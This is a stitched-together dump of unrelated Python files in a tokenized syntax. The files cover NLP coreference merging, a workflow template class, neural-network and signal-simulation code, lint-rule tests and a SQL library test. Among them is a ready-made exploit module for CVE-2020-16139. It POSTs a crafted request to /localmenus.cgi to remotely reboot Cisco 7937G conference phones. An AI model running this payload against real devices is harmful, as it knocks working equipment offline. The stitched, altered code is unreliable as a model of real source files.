k=representative<line_sep>occurrences[0],occurrences[k]=occurrences[0] occurrences[k]<line_sep>coreferences.append(occurrences)<block_end><return>coreferences<block_end><block_end><def_stmt>issues_merging_entities document entities# Checks is some general preconditions are met before proceeding to merge some # entities on a fiven document <block_start>kinds=set(e.kind<for>e entities)<if_stmt>len(kinds)<ne>1<block_start><return>"Cannot merge entities of different kinds {!r}".format(kinds)<block_end>gazettes=set(e.gazette<for>e entities<if>e.gazette)<if_stmt>len(gazettes)<g>1<block_start><return>"Cannot merge entities of different gazette items {!r}".format(gazettes)<block_end><block_end><def_stmt>apply_coreferences document coreferences<block_start>""" Makes all entity ocurrences listed in `coreferences` have the same entity. It uses coreference information to merge entity ocurrence's entities into a single entity. `correferences` is a list of tuples (i, j, head) where: - `i` is the offset in tokens where the occurrence starts. - `j` is the offset in tokens where the occurrence ends. - `head` is the index in tokens of the head of the occurrence (the "most important word"). Every entity occurrence in `coreference` might already exist or not in `document`. If no occurrence exists in `document` then nothing is done. If at least one ocurrence exists in `document` then all other ocurrences named in `coreference` are automatically created. This function can raise CofererenceError in case a merge is attempted on entities of different kinds. """<line_sep># For each token index make a list of the occurrences there occurrences=defaultdict(list)<for_stmt>occurrence document.entity_occurrences.all()<block_start><for_stmt>i range(occurrence.offset occurrence.offset_end)<block_start>occurrences[i].append(occurrence)<block_end><block_end>entities=[]# Existing entities referenced by correferences pickable_as_representant=[]<line_sep>missing=[]# References that have no entity occurrence yet <for_stmt>i,j,head sorted(coreferences)<block_start><if_stmt>occurrences[head]<block_start><for_stmt>x occurrences[head]<block_start>entities.append(x.entity)<if_stmt><not>x.anaphora<block_start>pickable_as_representant.append(x.entity)<block_end><block_end><block_end><else_stmt><block_start>missing.append((i j head))<block_end><block_end><if_stmt><not>pickable_as_representant<block_start><return><block_end>issues=issues_merging_entities(document entities)<if_stmt>issues<block_start><raise>CoreferenceError(issues)<block_end>from_ner=[r<for>r pickable_as_representant<if><not>r.gazette]<if_stmt>from_ner<block_start>canonical=from_ner[0]<block_end><else_stmt><block_start>canonical=pickable_as_representant[0]<block_end># Each missing coreference needs to be created into an occurrence now <for_stmt>i,j,head missing<block_start><if_stmt>j-i<ge>5# If the entity is a long phrase then just keep one token <block_start>i=head<line_sep>j=head+1<block_end>EntityOccurrence.objects.get_or_create(document=document entity=canonical offset=i offset_end=j alias=" ".join(document.tokens[i:j]) defaults={'anaphora':<true>})<block_end># Finally, the merging 'per se', where all things are entity occurrences <for_stmt>entity set(x<for>x entities<if>x<ne>canonical)<block_start><for_stmt>occurrence EntityOccurrence.objects.filter(entity=entity document=document)<block_start>occurrence.entity=canonical<line_sep>occurrence.save()<block_end><block_end><block_end>
# Copyright 2021 The Couler Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>collections OrderedDict<import_from_stmt>couler.core utils<class_stmt>Template(object)<block_start><def_stmt>__init__ self name output=<none> input=<none> timeout=<none> retry=<none> pool=<none> enable_ulogfs=<true> daemon=<false> cache=<none> parallelism=<none> <block_start>self.name=name<line_sep>self.output=output<line_sep>self.input=input<line_sep>self.timeout=timeout<line_sep>self.retry=retry<line_sep>self.pool=pool<line_sep>self.enable_ulogfs=enable_ulogfs<line_sep>self.daemon=daemon<line_sep>self.cache=cache<line_sep>self.parallelism:int=parallelism<block_end><def_stmt>to_dict self<block_start>template=OrderedDict({"name":self.name})<if_stmt>self.daemon<block_start>template["daemon"]=<true><block_end><if_stmt>self.timeout<is><not><none><block_start>template["activeDeadlineSeconds"]=self.timeout<block_end><if_stmt>self.retry<is><not><none><block_start>template["retryStrategy"]=utils.config_retry_strategy(self.retry)<block_end><if_stmt>self.cache<is><not><none><block_start>template["memoize"]=self.cache.to_dict()<block_end><if_stmt>self.parallelism<is><not><none><block_start>template["parallelism"]=self.parallelism<block_end><return>template<block_end><block_end>
# coding: utf-8 <import_stmt>chainer<import_stmt>chainer.functions<as>F<class_stmt>Unpooling2D(chainer.Chain)<block_start><def_stmt>forward self x<block_start>y=F.unpooling_2d(x 2 cover_all=<false>)<line_sep><return>y<block_end><block_end><class_stmt>Unpooling2D_3x4(chainer.Chain)<block_start><def_stmt>forward self x<block_start>y=F.unpooling_2d(x (3 4) cover_all=<false>)<line_sep><return>y<block_end><block_end># ====================================== <import_stmt>numpy<as>np<import_from_stmt>chainer_compiler.elichika testtools<def_stmt>main <block_start>x=np.random.rand(2 3 11 7).astype(np.float32)<line_sep>testtools.generate_testcase(Unpooling2D [x])<line_sep>testtools.generate_testcase(Unpooling2D_3x4 [x] subname='3x4')<line_sep># The largest input in FPN. x=np.random.rand(1 256 100 100).astype(np.float32)<line_sep>testtools.generate_testcase(Unpooling2D [x] subname='large')<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_from_stmt>.config load_config DEFAULTS<line_sep>
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Cisco 7937G Denial-of-Service Reboot Attack''' "description":'''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''' "severity":"high" "references":["https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" "cvss-score":"" "cve-id":"CVE-2020-16139" "cwe-id":""} "metadata":{"vuln-target":"" } "tags":["cve" "cve2020" "dos" "cisco"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""<line_sep>method="POST"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(resp0.status_code<eq>200)<and>("""application/xml"""<in>str(resp0.headers))<and>("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""<in>resp0.text)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Generates a mini_installer with a lower version than an existing one."""<import_stmt>argparse<import_stmt>subprocess<import_stmt>sys<def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--out' help='Path to the generated mini_installer.')<line_sep>args=parser.parse_args()<assert_stmt>args.out<line_sep><return>subprocess.call(['alternate_version_generator.exe' '--force' '--previous' '--out='+args.out ])<block_end><if_stmt>'__main__'<eq>__name__<block_start>sys.exit(main())<block_end>
"""Simulating time series, with aperiodic activity."""<import_stmt>numpy<as>np<import_from_stmt>scipy.stats zscore<import_from_stmt>scipy.linalg toeplitz cholesky<import_from_stmt>neurodsp.filt filter_signal infer_passtype<import_from_stmt>neurodsp.filt.fir compute_filter_length<import_from_stmt>neurodsp.filt.checks check_filter_definition<import_from_stmt>neurodsp.utils remove_nans<import_from_stmt>neurodsp.utils.checks check_param_range<import_from_stmt>neurodsp.utils.data create_times compute_nsamples<import_from_stmt>neurodsp.utils.decorators normalize<import_from_stmt>neurodsp.spectral rotate_powerlaw<import_from_stmt>neurodsp.sim.transients sim_synaptic_kernel<line_sep>################################################################################################### ################################################################################################### @normalize<def_stmt>sim_poisson_pop n_seconds fs n_neurons=1000 firing_rate=2<block_start>"""Simulate a Poisson population. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. n_neurons : int, optional, default: 1000 Number of neurons in the simulated population. firing_rate : float, optional, default: 2 Firing rate of individual neurons in the population. Returns ------- sig : 1d array Simulated population activity. Notes ----- The simulated signal is essentially white noise, but satisfies the Poisson property, i.e. mean(X) = var(X). The lambda parameter of the Poisson process (total rate) is determined as firing rate * number of neurons, i.e. summation of Poisson processes is still a Poisson processes. Note that the Gaussian approximation for a sum of Poisson processes is only a good approximation for large lambdas. Examples -------- Simulate a Poisson population: >>> sig = sim_poisson_pop(n_seconds=1, fs=500, n_neurons=1000, firing_rate=2) """<line_sep># Poisson population rate signal scales with # of neurons and individual rate lam=n_neurons<times>firing_rate<line_sep># Variance is equal to the mean sig=np.random.normal(loc=lam scale=lam<power>0.5 size=compute_nsamples(n_seconds fs))<line_sep># Enforce that sig is non-negative in cases of low firing rate sig[np.where(sig<l>0.)]=0.<line_sep><return>sig<block_end>@normalize<def_stmt>sim_synaptic_current n_seconds fs n_neurons=1000 firing_rate=2. tau_r=0. tau_d=0.01 t_ker=<none><block_start>"""Simulate a signal as a synaptic current, which has 1/f characteristics with a knee. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. n_neurons : int, optional, default: 1000 Number of neurons in the simulated population. firing_rate : float, optional, default: 2 Firing rate of individual neurons in the population. tau_r : float, optional, default: 0. Rise time of synaptic kernel, in seconds. tau_d : float, optional, default: 0.01 Decay time of synaptic kernel, in seconds. t_ker : float, optional Length of time of the simulated synaptic kernel, in seconds. Returns ------- sig : 1d array Simulated synaptic current. Notes ----- - This simulation is based on the one used in [1]_. - The resulting signal is most similar to unsigned intracellular current or conductance change. References ---------- .. [1] <NAME>., <NAME>., & <NAME>. (2017). Inferring synaptic excitation/inhibition balance from field potentials. NeuroImage, 158, 70–78. DOI: https://doi.org/10.1016/j.neuroimage.2017.06.078 Examples -------- Simulate a synaptic current signal: >>> sig = sim_synaptic_current(n_seconds=1, fs=500) """<line_sep># If not provided, compute t_ker as a function of decay time constant <if_stmt>t_ker<is><none><block_start>t_ker=5.<times>tau_d<block_end># Simulate an extra bit because the convolution will trim & turn off normalization sig=sim_poisson_pop((n_seconds+t_ker) fs n_neurons firing_rate mean=<none> variance=<none>)<line_sep>ker=sim_synaptic_kernel(t_ker fs tau_r tau_d)<line_sep>sig=np.convolve(sig ker 'valid')[:compute_nsamples(n_seconds fs)]<line_sep><return>sig<block_end>@normalize<def_stmt>sim_knee n_seconds fs chi1 chi2 knee<block_start>"""Simulate a signal whose power spectrum has a 1/f structure with a knee. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi1 : float Power law exponent before the knee. chi2 : float Power law exponent added to chi1 after the knee. knee : float Location of the knee in Hz. Returns ------- sig : 1d array Time series with the desired power spectrum. Notes ----- This simulated time series has a power spectrum that follows the Lorentzian equation: `P(f) = 1 / (f**chi1 * (f**chi2 + knee))` - This simulation creates this power spectrum shape using a sum of sinusoids. - The slope of the log power spectrum before the knee is chi1 whereas after the knee it is chi2, but only when the sign of chi1 and chi2 are the same. Examples -------- Simulate a time series with chi1 of -1, chi2 of -2, and knee of 100: >> sim_knee(n_seconds=10, fs=1000, chi1=-1, chi2=-2, knee=100) """<line_sep>times=create_times(n_seconds fs)<line_sep>n_samples=compute_nsamples(n_seconds fs)<line_sep># Create frequencies for the power spectrum, which will be freqs of the summed cosines freqs=np.linspace(0 fs/2 num=int(n_samples<floordiv>2+1) endpoint=<true>)<line_sep># Drop the DC component freqs=freqs[1:]<line_sep># Map the frequencies under the (square root) Lorentzian # This will give us the amplitude coefficients for the sinusoids cosine_coeffs=np.array([np.sqrt(1/(freq<power>-chi1<times>(freq<power>(-chi2-chi1)+knee)))<for>freq freqs])<line_sep># Add sinusoids with a random phase shift sig=np.sum(np.array([cosine_coeffs[ell]<times>np.cos(2<times>np.pi<times>freq<times>times+2<times>np.pi<times>np.random.rand())<for>ell,freq enumerate(freqs)]) axis=0)<line_sep><return>sig<block_end>@normalize<def_stmt>sim_random_walk n_seconds fs theta=1. mu=0. sigma=5.<block_start>"""Simulate a mean-reverting random walk, as an Ornstein-Uhlenbeck process. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. theta : float, optional, default: 1.0 Memory scale parameter. Larger theta values create faster fluctuations. mu : float, optional, default: 0.0 Mean of the random walk. sigma : float, optional, default: 5.0 Standard deviation of the random walk. Returns ------- sig : 1d array Simulated random walk signal. Notes ----- The random walk is simulated as a discretized Ornstein-Uhlenbeck process: `dx = theta*(x-mu)*dt + sigma*dWt` Where: - mu : mean - sigma : standard deviation - theta : memory scale - dWt : increments of Wiener process, i.e. white noise See the wikipedia page [1]_ for the integral solution. References ---------- .. [1] https://en.wikipedia.org/wiki/Ornstein-Uhlenbeck_process#Formal_solution Examples -------- Simulate a Ornstein-Uhlenbeck random walk: >>> sig = sim_random_walk(n_seconds=1, fs=500, theta=1.) """<line_sep>times=create_times(n_seconds fs)<line_sep>x0=mu<line_sep>dt=times[1]-times[0]<line_sep>ws=np.random.normal(size=len(times))<line_sep>ex=np.exp(-theta<times>times)<line_sep>ws[0]=0.<line_sep>sig=x0<times>ex+mu<times>(1.-ex)+sigma<times>ex<times>np.cumsum(np.exp(theta<times>times)<times>np.sqrt(dt)<times>ws)<line_sep><return>sig<block_end>@normalize<def_stmt>sim_powerlaw n_seconds fs exponent=-2.0 f_range=<none> **filter_kwargs<block_start>"""Simulate a power law time series, with a specified exponent. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. exponent : float, optional, default: -2 Desired power-law exponent, of the form P(f)=f^exponent. f_range : list of [float, float] or None, optional Frequency range to filter simulated data, as [f_lo, f_hi], in Hz. **filter_kwargs : kwargs, optional Keyword arguments to pass to `filter_signal`. Returns ------- sig : 1d array Time-series with the desired power law exponent. Notes ----- - Powerlaw data with exponents is created by spectrally rotating white noise [1]_. References ---------- .. [1] <NAME>., & <NAME>. (1995). On Generating Power Law Noise. Astronomy and Astrophysics, 300, 707–710. Examples -------- Simulate a power law signal, with an exponent of -2 (brown noise): >>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-2.0) Simulate a power law signal, with a highpass filter applied at 2 Hz: >>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-1.5, f_range=(2, None)) """<line_sep># Compute the number of samples for the simulated time series n_samples=compute_nsamples(n_seconds fs)<line_sep># Get the number of samples to simulate for the signal # If signal is to be filtered, with FIR, add extra to compensate for edges <if_stmt>f_range<and>filter_kwargs.get('filter_type' <none>)<ne>'iir'<block_start>pass_type=infer_passtype(f_range)<line_sep>filt_len=compute_filter_length(fs pass_type *check_filter_definition(pass_type f_range) n_seconds=filter_kwargs.get('n_seconds' <none>) n_cycles=filter_kwargs.get('n_cycles' 3))<line_sep>n_samples<augadd>filt_len+1<block_end># Simulate the powerlaw data sig=_create_powerlaw(n_samples fs exponent)<if_stmt>f_range<is><not><none><block_start>sig=filter_signal(sig fs infer_passtype(f_range) f_range remove_edges=<true> **filter_kwargs)<line_sep># Drop the edges, that were compensated for, if not using FIR filter <if_stmt><not>filter_kwargs.get('filter_type' <none>)<eq>'iir'<block_start>sig,_=remove_nans(sig)<block_end><block_end><return>sig<block_end>@normalize<def_stmt>sim_frac_gaussian_noise n_seconds fs chi=0 hurst=<none><block_start>"""Simulate a timeseries as fractional gaussian noise. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi: float, optional, default: 0 Desired power law exponent of the spectrum of the signal. Must be in the range (-1, 1). hurst : float, optional, default: None Desired Hurst parameter, which must be in the range (0, 1). If provided, this value overwrites the `chi` parameter. Returns ------- sig: 1d array Simulated fractional gaussian noise time series. Notes ----- The time series can be specified with either a desired power law exponent, or alternatively with a specified Hurst parameter. The Hurst parameter is not the Hurst exponent as defined in rescaled range analysis. The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0, where this equality holds in distribution. The relationship between the power law exponent chi and the Hurst parameter for fractional gaussian noise is chi = 2 * hurst - 1. For more information, consult [1]_. References ---------- .. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38. DOI: https://doi.org/10.1088/0967-3334/23/1/201 Examples -------- Simulate fractional gaussian noise with a power law decay of 0 (white noise): >>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, chi=0) Simulate fractional gaussian noise with a Hurst parameter of 0.5 (also white noise): >>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, hurst=0.5) """<if_stmt>hurst<is><not><none><block_start>check_param_range(hurst 'hurst' (0 1))<block_end><else_stmt><block_start>check_param_range(chi 'chi' (-1 1))<line_sep># Infer the hurst parameter from chi hurst=(-chi+1.)/2<block_end># Compute the number of samples for the simulated time series n_samples=compute_nsamples(n_seconds fs)<line_sep># Define helper function for computing the auto-covariance <def_stmt>autocov hurst<block_start><return><lambda>k:0.5<times>(np.abs(k-1)<power>(2<times>hurst)-2<times>k<power>(2<times>hurst)+(k+1)<power>(2<times>hurst))<block_end># Build the autocovariance matrix gamma=np.arange(0 n_samples)<line_sep>gamma=np.apply_along_axis(autocov(hurst) 0 gamma)<line_sep>autocov_matrix=toeplitz(gamma)<line_sep># Use the Cholesky factor to transform white noise to get the desired time series white_noise=np.random.randn(n_samples)<line_sep>cholesky_factor=cholesky(autocov_matrix lower=<true>)<line_sep>sig=cholesky_factor@white_noise<line_sep><return>sig<block_end>@normalize<def_stmt>sim_frac_brownian_motion n_seconds fs chi=-2 hurst=<none><block_start>"""Simulate a timeseries as fractional brownian motion. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi : float, optional, default: -2 Desired power law exponent of the spectrum of the signal. Must be in the range (-3, -1). hurst : float, optional, default: None Desired Hurst parameter, which must be in the range (0, 1). If provided, this value overwrites the `chi` parameter. Returns ------- sig : 1d array Simulated fractional brownian motion time series. Notes ----- The time series can be specified with either a desired power law exponent, or alternatively with a specified Hurst parameter. Note that when specifying there can be some bias leading to a steeper than expected spectrum of the simulated signal. This bias is higher for chi values near to 1, and may be more severe in shorter signals. The Hurst parameter is not the Hurst exponent in general. The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0, where this equality holds in distribution. The relationship between the power law exponent chi and the Hurst parameter for fractional brownian motion is chi = 2 * hurst + 1 For more information, consult [1]_ and/or [2]_. References ---------- .. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38. DOI: https://doi.org/10.1088/0967-3334/23/1/201 .. [2] <NAME>. (2004). Simulation of fractional Brownian motion. 77. Examples -------- Simulate fractional brownian motion with a power law exponent of -2 (brown noise): >>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, chi=-2) Simulate fractional brownian motion with a Hurst parameter of 0.5 (also brown noise): >>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, hurst=0.5) """<if_stmt>hurst<is><not><none><block_start>check_param_range(hurst 'hurst' (0 1))<block_end><else_stmt><block_start>check_param_range(chi 'chi' (-3 -1))<line_sep># Infer the hurst parameter from chi hurst=(-chi-1.)/2<block_end># Fractional brownian motion is the cumulative sum of fractional gaussian noise fgn=sim_frac_gaussian_noise(n_seconds fs hurst=hurst)<line_sep>sig=np.cumsum(fgn)<line_sep><return>sig<block_end><def_stmt>_create_powerlaw n_samples fs exponent<block_start>"""Create a power law time series. Parameters ---------- n_samples : int The number of samples to simulate. fs : float Sampling rate of simulated signal, in Hz. exponent : float Desired power-law exponent, of the form P(f)=f^exponent. Returns ------- sig : 1d array Time-series with the desired power law exponent. Notes ----- This function creates variable power law exponents by spectrally rotating white noise. """<line_sep># Start with white noise signal, that we will rotate, in frequency space sig=np.random.randn(n_samples)<line_sep># Compute the FFT fft_output=np.fft.fft(sig)<line_sep>freqs=np.fft.fftfreq(len(sig) 1./fs)<line_sep># Rotate spectrum and invert back to time series, with a z-score to normalize # Delta exponent is divided by two, as the FFT output is in units of amplitude not power fft_output_rot=rotate_powerlaw(freqs fft_output -exponent/2)<line_sep>sig=zscore(np.real(np.fft.ifft(fft_output_rot)))<line_sep><return>sig<block_end>
''' Follow up for "Remove Duplicates": What if duplicates are allowed at most twice? For example, Given sorted array nums = [1,1,1,2,2,3], Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3. It doesn't matter what you leave beyond the new length. '''<class_stmt>Solution(object)<block_start><def_stmt>removeDuplicates self nums<block_start>""" :type nums: List[int] :rtype: int """<line_sep>count=0<for_stmt>i range(len(nums))<block_start><if_stmt>count<l>2<or>nums[count-2]<ne>nums[i]<block_start>nums[count]=nums[i]<line_sep>count<augadd>1<block_end><block_end><return>count<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>l=[1 1 1 2 2 3]<line_sep>r=Solution().removeDuplicates(l)<assert_stmt>l<eq>[1 1 2 2 3 3]<assert_stmt>r<eq>5<block_end>
<import_stmt>pytest<import_from_stmt>wemake_python_styleguide.violations.oop UnpythonicGetterSetterViolation <import_from_stmt>wemake_python_styleguide.visitors.ast.classes WrongClassBodyVisitor<line_sep>module_getter_and_setter=""" attribute = 1 def get_attribute(): ... def set_attribute(): ... """<line_sep>static_getter_and_setter=""" attribute = 1 class Test(object): @staticmethod def get_attribute(): ... @staticmethod def set_attribute(): ... """<line_sep>paired_getter_and_setter=""" class Test(object): def get_attribute(): ... def set_attribute(): ... """<line_sep>property_getter_and_setter=""" class Test(object): def __init__(self): self.attribute = 1 @property def attribute(self): ... @attribute.setter def attribute(self): ... """<line_sep>dataclass_property_getter_setter=""" @dataclass class DataClass(object): attribute: int @property def attribute(self): ... @attribute.setter def attribute(self): ... """<line_sep>dataclass_incorrect_property_getter_setter=""" @dataclass class DataClass(object): attribute: int @property def get_attribute(self): ... @attribute.setter def set_attribute(self): ... """<line_sep>dataclass_getter_setter=""" @dataclass class DataClass(object): attribute: int def get_attribute(self): ... def set_attribute(self): ... """<line_sep>child_getter_and_setter=""" class TestParent(object): def __init__(self): self.attribute = 1 class TestChild(TestParent): def get_attribute(self): ... def set_attribute(self): ... """<line_sep>nested_getter_and_setter=""" class Template(object): def __init__(self): self.attribute = 1 def some_function(self): def get_attribute(self): ... def set_attribute(self): ... get_attribute(self) """<line_sep>class_getter_and_setter_attributes=""" class Test(object): attribute = 1 get_attribute = 1 set_attribute = 1 """<line_sep>instance_getter_and_setter_attributes=""" class Test(object): def __init__(self): self.attribute = 1 self.get_attribute = 1 self.set_attribute = 1 """<line_sep>other_getter_and_setter=""" class Test(object): def __init__(self, other): other.attr = self.some() def get_attr(self): return something.unrelated() """<line_sep>instance_attribute_template=""" class Template(object): def __init__(self): self.{0}{1}{2} {3} def {4}(self): ... """<line_sep>class_attribute_template=""" class Template(object): {0}{1}{2} {3} def {4}: ... """<line_sep>class_mixed=""" class Test(object): first: int second = 2 third: int = 3 def __init__(self): self.{0}{1} = 5 def get_{2}(self): ... def set_{3}(self): ... """<line_sep>@pytest.mark.parametrize('code' [module_getter_and_setter nested_getter_and_setter property_getter_and_setter class_getter_and_setter_attributes instance_getter_and_setter_attributes dataclass_property_getter_setter other_getter_and_setter ])<def_stmt>test_valid_getter_and_setter assert_errors parse_ast_tree default_options code mode <block_start>"""Testing that correct usage of getter/setter is allowed."""<line_sep>tree=parse_ast_tree(mode(code))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('code' [dataclass_getter_setter dataclass_incorrect_property_getter_setter static_getter_and_setter child_getter_and_setter paired_getter_and_setter ])<def_stmt>test_invalid_getter_and_setter assert_errors parse_ast_tree default_options code mode <block_start>"""Testing that wrong use of getter/setter is prohibited."""<line_sep>tree=parse_ast_tree(mode(code))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation UnpythonicGetterSetterViolation ])<block_end>@pytest.mark.parametrize('access' [''])@pytest.mark.parametrize('assignment' [' = 1'])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '' 'get_attribute_some') ('attribute' '' 'some_get_attribute') ('attribute' '' 'get_some_attribute') ('attribute' '' 'attribute_get') ('some_attribute' '' 'get_attribute') ('attribute_some' '' 'get_attribute') ])<def_stmt>test_nonmatching_instance assert_errors parse_ast_tree default_options access assignment attribute_name annotation method_name mode <block_start>"""Testing that non matching attribute and getter/setter is allowed."""<line_sep>test_instance=instance_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize('assignment' [' = 1' ': int = 1' ' = self.other = 1' ', self.other = 1, 2' ])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '' 'get_attribute') ('attribute' '' 'set_attribute') ('attribute_some' '' 'get_attribute_some') ('some_attribute' '' 'set_some_attribute') ('attribute' '@classmethod' 'get_attribute') ('attribute' '@classmethod' 'set_attribute') ('attribute' '@staticmethod' 'get_attribute') ('attribute' '@staticmethod' 'set_attribute') ('attribute' '@property' 'get_attribute') ('attribute' '@attribute.setter' 'set_attribute') ])<def_stmt>test_instance_getter_setter assert_errors parse_ast_tree default_options access assignment attribute_name annotation method_name mode <block_start>"""Testing that instance attribute and getter/setter is prohibited."""<line_sep>test_instance=instance_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation])<block_end>@pytest.mark.parametrize('access' [''])@pytest.mark.parametrize('assignment' [' = 1'])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '@classmethod' 'get_attribute_some(self)') ('attribute' '@classmethod' 'some_get_attribute(self)') ('attribute' '@classmethod' 'get_some_attribute(self)') ('attribute' '@classmethod' 'attribute_get(self)') ('some_attribute' '@classmethod' 'get_attribute(self)') ('attribute_some' '@classmethod' 'get_attribute(self)') ])<def_stmt>test_nonmatching_class assert_errors parse_ast_tree default_options access attribute_name annotation method_name assignment mode <block_start>"""Testing that non matching attribute and getter/setter is allowed."""<line_sep>test_instance=class_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize('assignment' [' = 1' ': int = 1' ': int' ' = other = 1' ', other = 1, 2' ])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '@classmethod' 'get_attribute(cls)') ('attribute' '@classmethod' 'set_attribute(cls)') ('attribute_some' '@classmethod' 'get_attribute_some(self)') ('some_attribute' '@classmethod' 'set_some_attribute(self)') ('attribute' '' 'get_attribute(cls)') ('attribute' '' 'set_attribute(cls)') ('attribute' '@staticmethod' 'get_attribute(cls)') ('attribute' '@staticmethod' 'set_attribute(cls)') ])<def_stmt>test_class_attributes_getter_setter assert_errors parse_ast_tree default_options attribute_name access annotation method_name assignment mode <block_start>"""Testing that using getter/setters with class attributes is prohibited."""<line_sep>test_instance=class_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize(('first' 'second' 'third') [('attribute' 'some' 'other') ('attribute' 'some' 'another') ])<def_stmt>test_class_mixed assert_errors parse_ast_tree default_options access first second third mode <block_start>"""Testing correct use of methods with get/set in name."""<line_sep>test_instance=class_mixed.format(access first second third)<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>
<import_stmt>peewee<import_stmt>playhouse.pool<line_sep># This is just one example of one of the support databases # see https://docs.peewee-orm.com/en/latest/peewee/database.html db=peewee.MySQLDatabase()<line_sep>conn=db.connection()<line_sep>cursor=conn.cursor()<line_sep>cursor.execute("sql")# $ getSql="sql" cursor=db.cursor()<line_sep>cursor.execute("sql")# $ getSql="sql" db.execute_sql("sql")# $ getSql="sql" # Pool extension pool=playhouse.pool.PooledMySQLDatabase(<ellipsis>)<line_sep>pool.execute_sql("sql")# $ getSql="sql"
